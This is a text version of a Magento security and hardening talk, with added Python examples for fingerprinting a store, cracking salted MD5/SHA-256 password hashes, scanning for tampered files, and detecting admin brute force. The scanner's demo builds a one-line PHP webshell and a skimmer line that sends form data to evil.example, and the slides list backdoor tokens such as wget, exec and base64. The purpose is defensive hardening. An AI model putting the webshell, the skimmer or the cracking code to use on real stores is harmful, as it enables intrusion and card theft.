Mar 2, 2017, Meet Magento 2017, Milan
Andrea Zwirner – Linkspirit, Magento security and hardening strategies
Magento security and hardening strategies
Andrea Zwirner
@AndreaZwirner
Information security
Environment
● Linux, Apache, MariaDB, PHP
● Magento 1.9.x.y
– We will be as platform independent as possible
Magento average security
● Magento is a good product and security is never underestimated
– Fast security patches for both the 1.9.x and 2.x branches
– URL protection (a secret key is added to admin URLs)
– Session validation (against session poisoning, hijacking and fixation attacks)
– CSRF protection
– CAPTCHA on the admin login (against brute force)
Magento average security
● Sensitive data (card data, integration passwords) are encrypted with a separate encryption key
● There is also a lot of documentation on security and hardening
Magento average security
● Anyway, the team is doing a great job!
● But it might all be useless if…
A secure platform in an insecure world
Stack diagram, bottom to top: Hardware, Operating System, Libraries, Application, Services
Full of unprepared users...
Stack diagram, bottom to top: Hardware, Operating System, Libraries, Application, Services, with the User on top of everything
Backend security
● Workstations that work with the backend need to be hardened
● The same applies to the environment in which those workstations operate
– And to the environments it is connected to, including suppliers, clients, etc.
● Users need to be made aware of the risks they might expose the application to
What’s the strategy?
“Ensuring cybersecurity is a common responsibility. End users play a crucial
role in ensuring the security of networks and information systems: they need to
be made aware of the risks they face online and be empowered to take simple
steps to guard against them.”
Cybersecurity Strategy of the European Union, European Commission, Feb 2013
Never underestimate the importance of end users
Ok, let’s start!
Enumeration is the key
● If you want to crack it, you need to know it
● The quieter you become, the more you're able to hear
● You can't just try every single weapon you have in your armory
– That would alarm any kind of IPS at any level
Enumeration – /magento_version
Enumeration – /downloader
Enumeration – static files 1
● /skin/frontend/default/default/css/styles.css
Enumeration – static files 2
Enumeration in web application scanners
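The enumeration slides above show the three passive fingerprinting sources (/magento_version, /downloader and well-known static files) as screenshots. The script below is an added example, not the talk's own tooling: it probes those paths and turns the answers into a fingerprint, and the same function re-run after hardening confirms the routes are gone. The HTTP layer is injected so it runs offline against constructed responses; the "Magento/1.9 (Community)" banner format, the "Magento Connect Manager" page title and the /js/mage/cookies.js path are assumptions about a stock 1.x install, not values taken from the slides.

```python
"""Fingerprint a Magento 1.x install from a handful of unauthenticated requests.

Added example, not part of the talk. The fetcher is injected so the
fingerprint logic can be exercised offline against constructed responses.
Only point real_fetcher() at stores you are authorised to test.
"""
import re
from typing import Callable, Dict, Optional, Tuple

# A fetcher returns (status_code, body) for a path, or None on connection error.
Fetcher = Callable[[str], Optional[Tuple[int, str]]]

# Paths worth probing (assumed defaults of a stock Magento 1.x deployment).
# /downloader is the Magento Connect Manager, an admin-level package installer.
PROBES = {
    "version": "/magento_version",
    "downloader": "/downloader/",
    "skin_css": "/skin/frontend/default/default/css/styles.css",
    "js": "/js/mage/cookies.js",
}

# Assumed banner format of /magento_version: "Magento/<major.minor> (<edition>)"
VERSION_RE = re.compile(r"Magento/(\d+\.\d+)\s*\((\w+)\)")


def fingerprint(fetch: Fetcher) -> Dict[str, object]:
    """Return what an attacker could learn from unauthenticated requests."""
    findings: Dict[str, object] = {
        "is_magento": False, "version": None, "edition": None,
        "downloader_exposed": False, "static_hits": [],
    }
    resp = fetch(PROBES["version"])
    if resp and resp[0] == 200:
        m = VERSION_RE.search(resp[1])
        if m:
            findings.update(is_magento=True, version=m.group(1), edition=m.group(2))
    resp = fetch(PROBES["downloader"])
    if resp and resp[0] == 200 and "Magento Connect Manager" in resp[1]:
        findings["downloader_exposed"] = True
        findings["is_magento"] = True
    for key in ("skin_css", "js"):
        resp = fetch(PROBES[key])
        if resp and resp[0] == 200:
            findings["static_hits"].append(PROBES[key])
            findings["is_magento"] = True
    return findings


# Constructed responses standing in for an unhardened store ...
UNHARDENED = {
    "/magento_version": (200, "Magento/1.9 (Community)"),
    "/downloader/": (200, "<title>Magento Connect Manager</title>..."),
    "/skin/frontend/default/default/css/styles.css": (200, "body{margin:0}"),
    "/js/mage/cookies.js": (200, "var Mage = Mage || {};"),
}
# ... and the same store after the version route was removed, the downloader
# blocked and the default static paths renamed.
HARDENED = {
    "/magento_version": (404, "Not Found"),
    "/downloader/": (403, "Forbidden"),
    "/skin/frontend/default/default/css/styles.css": (404, "Not Found"),
    "/js/mage/cookies.js": (404, "Not Found"),
}


def fake_fetcher(table: Dict[str, Tuple[int, str]]) -> Fetcher:
    """Offline fetcher backed by a dict of constructed responses."""
    return lambda path: table.get(path)


def real_fetcher(base_url: str, timeout: float = 5.0) -> Fetcher:
    """Fetcher backed by urllib, for hosts you have permission to probe."""
    import urllib.error
    import urllib.request

    def fetch(path: str) -> Optional[Tuple[int, str]]:
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as r:
                return r.getcode(), r.read(4096).decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, ""
        except (urllib.error.URLError, OSError):
            return None
    return fetch


if __name__ == "__main__":
    print("unhardened:", fingerprint(fake_fetcher(UNHARDENED)))
    print("hardened:  ", fingerprint(fake_fetcher(HARDENED)))
```

Against the unhardened responses the fingerprint yields version, edition, an exposed Connect Manager and two confirming static files; against the hardened ones it learns nothing, which is the state the later hardening slides aim for.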
It’s attack time!
● We have to make a couple of assumptions
– A vulnerable Magento version (1.9.1.0 CE or 1.14.1.0 EE)
– Not patched with SUPEE-5344
– That means RCE… Uh ohhh…
It’s attack time!
● The uploaded backdoor.tgz package drops backdoor.php (a Meterpreter reverse shell) into /errors
It’s attack time!
● Misconfigurations
– The downloader is exposed and unprotected
– File system permissions have not been reset (maybe after the last extension install)
TCP reverse shell
Getting DB credentials
DB dump!
Passwords
● md5(salt + password):salt or sha-256(salt + password):salt, no bcrypt, scrypt or PBKDF2 :-(
Let’s crack them, with hashcat!
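The two slides above give the stored hash layout and then hand the dump to hashcat. As an added example (not the talk's own material), the script below reproduces that layout, verifies a candidate the way the application would, and runs a small offline dictionary attack with a few mangling rules to show why an unsalted-per-iteration fast hash falls to a wordlist in a handful of guesses. The hashes are constructed here from chosen passwords, not taken from any real dump; the wordlist and rules are illustrative.

```python
"""Magento 1.x password hashes: format, verification and a dictionary attack.

Added example, not from the talk. The stored form is
  md5(salt . password) . ":" . salt      (32-hex digest, older installs)
  sha256(salt . password) . ":" . salt   (64-hex digest, 1.9.1 and later)
Everything below is constructed; no real credentials are involved.
"""
import hashlib
import hmac
from typing import Iterable, Iterator, Optional, Tuple


def magento_hash(password: str, salt: str, algo: str = "md5") -> str:
    """Produce a hash in the stored format: hex(algo(salt + password)) + ':' + salt."""
    digest = hashlib.new(algo, (salt + password).encode()).hexdigest()
    return f"{digest}:{salt}"


def _algo_for(digest: str) -> Optional[str]:
    return {32: "md5", 64: "sha256"}.get(len(digest))


def verify(stored: str, candidate: str) -> bool:
    """Application-side check, constant-time on the comparison."""
    digest, _, salt = stored.partition(":")
    algo = _algo_for(digest)
    if not salt or algo is None:      # unsalted legacy form or unknown digest size
        return False
    return hmac.compare_digest(magento_hash(candidate, salt, algo), stored)


# Constructed wordlist; a real attack would use a multi-million entry list.
COMMON = ["password", "123456", "magento", "admin", "welcome", "qwerty", "letmein"]


def candidates(words: Iterable[str]) -> Iterator[str]:
    """Cheap mangling rules (capitalise, common suffixes) in the spirit of hashcat rules."""
    for w in words:
        yield w
        yield w.capitalize()
        for suffix in ("1", "123", "2017", "!"):
            yield w + suffix
            yield w.capitalize() + suffix


def crack(stored: str, words: Iterable[str]) -> Tuple[Optional[str], int]:
    """Offline dictionary attack. Returns (password or None, guesses tried)."""
    digest, _, salt = stored.partition(":")
    algo = _algo_for(digest)
    if algo is None:
        raise ValueError("unrecognised digest length")
    attempts = 0
    for cand in candidates(words):
        attempts += 1
        if magento_hash(cand, salt, algo) == stored:
            return cand, attempts
    return None, attempts


# Constructed rows as they would look in admin_user.password / customer password_hash
SAMPLE_MD5 = magento_hash("Magento2017", "Ab", "md5")
SAMPLE_SHA = magento_hash("welcome1", "xYz3", "sha256")
SAMPLE_STRONG = magento_hash("c0rrect-horse-battery", "Qq", "sha256")

if __name__ == "__main__":
    for label, stored in (("md5", SAMPLE_MD5), ("sha256", SAMPLE_SHA), ("strong", SAMPLE_STRONG)):
        print(label, stored, "->", crack(stored, COMMON))
```

The salt only stops precomputed tables; per-guess cost is one MD5 or SHA-256, so the attacker's speed is bounded by the GPU, not by the scheme. For a real dump the same work is done by hashcat with mode 20 (md5($salt.$pass)) or 1420 (sha256($salt.$pass)) on the digest:salt lines, which is why the slide wishes for bcrypt, scrypt or PBKDF2.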
Option two: frontend malware (common!)
And your card number is?
Why does all this stuff work?
● Vulnerable components are in use (at any level of the stack)
– Whatever Magento version you use, it has to be patched (quickly)!
● Misconfigurations
– Whoever works inside the environment has to know (well) what they are doing!
So, let’s harden it – basic
● Monitor issues for every single component of the stack, and patch accordingly
● Restrict access to administrative functions to specific IP addresses
● Hide sensitive URLs (admin / downloader / extensions) behind custom URLs
● Block access to development / staging / test environments
So, let’s harden it – mid
● Run Magento inside a dedicated environment
● Always apply the principle of least privilege
● Automate the deployment process
– Extensions should not be installed in production
– Implement automated checks (unit tests, static code analysis, etc.)
● Audit the user list and enable two-factor authentication (Nexcess, miniOrange, etc.)
So, let’s harden it – advanced
● Check the Admin Action Logs and compare them with policies / timing / etc.
● Check file integrity (compare production with a clean version), mtimes, etc.
● Monitor all system logins and compare them with policies / timing / etc.
● Choose extensions accordingly (e.g. ASVS compliance / code review / pen-test)
– If possible, avoid extensions with upload functions
So, let’s harden it – advanced
● Monitor for common malicious functions or code
– curl(, FILE_APPEND, file_put_, fwrite, http.open, http.send, mail, <script, etc.
● Monitor for files bigger than 2-3 MB
– They can contain stolen data waiting to be sent to the attacker
● Monitor for common backdoor code
– A lot of it: base64, exec, wget, system, move_uploaded_file, encodeURI, etc.
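The two advanced slides above (file integrity against a clean copy, and watching for backdoor functions and oversized files) are the checks most shops never script. The following is an added example, not tooling from the talk: it hashes a clean deploy as a baseline, diffs production against it, and greps code files for the function names the slides list. The trees it runs on are constructed in a temporary directory (a webshell in /errors like the one in the attack demo, a skimmer appended to a JS file, and an oversized dump); the token list and the size threshold are illustrative and should be tuned per site.

```python
"""File-integrity and backdoor-pattern check for a Magento document root.

Added example, not the talk's own tooling. Check 1 diffs production against
a hashed baseline from a clean deploy; check 2 scans code files for
functions commonly found in webshells and skimmers and flags oversize
files. Demo data is constructed in a temp directory so it runs offline.
"""
import hashlib
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Tokens from the slides plus a few siblings. A hit is a review trigger,
# not proof of compromise: legitimate code calls mail() and fwrite() too.
SUSPICIOUS = re.compile(
    r"\b(?:base64_decode|eval|exec|system|passthru|shell_exec|move_uploaded_file|"
    r"file_put_contents|fwrite|curl_exec|mail|encodeURI(?:Component)?)\s*\("
    r"|FILE_APPEND|<script",
    re.IGNORECASE,
)
CODE_EXT = (".php", ".phtml", ".js", ".html")


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root: str) -> Dict[str, str]:
    """Map relative path -> sha256 for every regular file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root)] = sha256_file(full)
    return out


def diff(clean: Dict[str, str], prod: Dict[str, str]) -> Dict[str, List[str]]:
    """Files only in prod (dropped), only in clean (deleted) or with a changed hash."""
    return {
        "added": sorted(set(prod) - set(clean)),
        "removed": sorted(set(clean) - set(prod)),
        "changed": sorted(p for p in set(clean) & set(prod) if clean[p] != prod[p]),
    }


def scan_code(root: str, max_size: int = 3 * 1024 * 1024) -> Tuple[Dict[str, List[str]], List[str]]:
    """Return ({relpath: [matched tokens]}, [relpaths larger than max_size])."""
    hits, oversize = {}, []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.path.getsize(full) > max_size:
                oversize.append(rel)            # possible staged exfiltration
            if not name.lower().endswith(CODE_EXT):
                continue
            with open(full, "r", errors="replace") as f:
                tokens = sorted({m.group(0) for m in SUSPICIOUS.finditer(f.read())})
            if tokens:
                hits[rel] = tokens
    return hits, sorted(oversize)


def build_demo() -> Tuple[str, str]:
    """Create a clean tree and a tampered production copy (constructed data)."""
    clean, prod = tempfile.mkdtemp(prefix="clean_"), tempfile.mkdtemp(prefix="prod_")
    files = {
        "index.php": "<?php require 'app/Mage.php'; Mage::run();",
        "js/mage/cookies.js": "var Mage = Mage || {};",
        "errors/404.php": "<?php echo 'Not found';",
    }
    for root in (clean, prod):
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write(body)
    # Tampering: a dropped webshell, a card skimmer appended to a JS file,
    # and an oversized file parked in a writable directory.
    with open(os.path.join(prod, "errors/backdoor.php"), "w") as f:
        f.write("<?php eval(base64_decode($_POST['c']));")
    with open(os.path.join(prod, "js/mage/cookies.js"), "a") as f:
        f.write("\nnew Image().src='//evil.example/?d='+encodeURIComponent(document.forms[0].innerHTML);")
    os.makedirs(os.path.join(prod, "media"), exist_ok=True)
    with open(os.path.join(prod, "media/dump.sql"), "w") as f:
        f.write("x" * 2048)
    return clean, prod


if __name__ == "__main__":
    clean, prod = build_demo()
    print(diff(baseline(clean), baseline(prod)))
    print(scan_code(prod, max_size=1024))
```

Run the baseline step on the artefact your deployment pipeline produces, not on a production box, and store the hash list off-host; a cron job that diffs and scans nightly turns the slide's advice into an alert.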
So, let’s harden it – advanced
● Do anything you can to make enumeration harder
– Remove service banners
– Remove metadata
– Remove/change static files
● *_version, README, etc.
● *.css, *.js
A common attack: brute force
Intrusion Prevention
● Should we just wait for the attacker to guess the password?
● Intrusion Prevention Systems
– Policy verification through log analysis
● Web application firewalls
– Configuration (platform dependent)
– Review (at least on application changes)
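The brute-force slide and the "policy verification through log analysis" bullet above describe what an IPS such as fail2ban does for the admin login. The script below is an added example (not from the talk) of that detection logic run over constructed combined-format access-log lines: it counts admin-login POSTs per client IP in a sliding window and reports the IPs that cross a threshold. It assumes the default admin front name /index.php/admin/ has not been renamed and that a failed Magento 1 admin login re-renders the form with HTTP 200 while a successful one redirects with 302; both are assumptions to confirm against your own logs before wiring the output to a ban action.

```python
"""Flag admin-login brute forcing from web-server access logs.

Added example, not part of the talk. Parses Apache/nginx combined-format
lines (constructed below), keeps a sliding window of failed admin-login
POSTs per client IP and reports IPs that exceed a threshold. Assumptions:
the admin front name is the default and a failed login answers 200
(form re-rendered) while a successful one answers 302.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterable, Iterator, Optional, Tuple

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
ADMIN_LOGIN = "/index.php/admin/"      # assumption: default admin front name
WINDOW = timedelta(minutes=5)
THRESHOLD = 5

Event = Tuple[str, datetime, str, str, int]


def parse(line: str) -> Optional[Event]:
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def failed_logins(events: Iterable[Event]) -> Iterator[Tuple[str, datetime]]:
    """A POST to the admin login answered with 200 is treated as a failed attempt."""
    for ip, ts, method, path, status in events:
        if method == "POST" and path.startswith(ADMIN_LOGIN) and status == 200:
            yield ip, ts


def detect(lines: Iterable[str], window: timedelta = WINDOW,
           threshold: int = THRESHOLD) -> Dict[str, datetime]:
    """Return {ip: timestamp at which it crossed `threshold` failures in `window`}."""
    recent: Dict[str, deque] = defaultdict(deque)
    flagged: Dict[str, datetime] = {}
    events = [e for e in map(parse, lines) if e]
    for ip, ts in failed_logins(events):
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:     # drop attempts outside the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def _line(ip: str, ts: str, method: str, path: str, status: int, ua: str = "Mozilla/5.0") -> str:
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 4821 "-" "{ua}"'


# Constructed sample: one scripted attacker, one legitimate admin, one slow prober.
SAMPLE_LOG = (
    [_line("203.0.113.7", f"02/Mar/2017:10:00:{s:02d} +0100", "POST", ADMIN_LOGIN, 200,
           "python-requests/2.13") for s in range(0, 60, 10)]
    + [_line("198.51.100.20", "02/Mar/2017:10:01:10 +0100", "POST", ADMIN_LOGIN, 200),
       _line("198.51.100.20", "02/Mar/2017:10:01:40 +0100", "POST", ADMIN_LOGIN, 302),
       _line("198.51.100.20", "02/Mar/2017:10:01:41 +0100", "GET", ADMIN_LOGIN + "dashboard/", 200)]
    + [_line("192.0.2.9", f"02/Mar/2017:{10 + h}:00:00 +0100", "POST", ADMIN_LOGIN, 200)
       for h in range(3)]
)

if __name__ == "__main__":
    for ip, when in detect(SAMPLE_LOG).items():
        print(f"{ip} crossed {THRESHOLD} failed admin logins at {when}")
```

The slow prober below the threshold is the case a pure per-window rule misses; pair this with the CAPTCHA and lockout the platform already offers, and with the admin IP restriction from the basic hardening slide, rather than relying on the rate limit alone.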
Know your enemy
● Should we just wait for the attacker to find the right path?
● Attack information must be collected and analyzed
● You have to understand who the attacker is and what their goal is
And then… Shit happens!
● Make sure your governance level is granular enough to understand what’s happening
● You have to know what the system is doing, not just that it is “working”
● And when everything has gone wrong, the keywords are
– Backup
– Restore
– Disaster recovery plan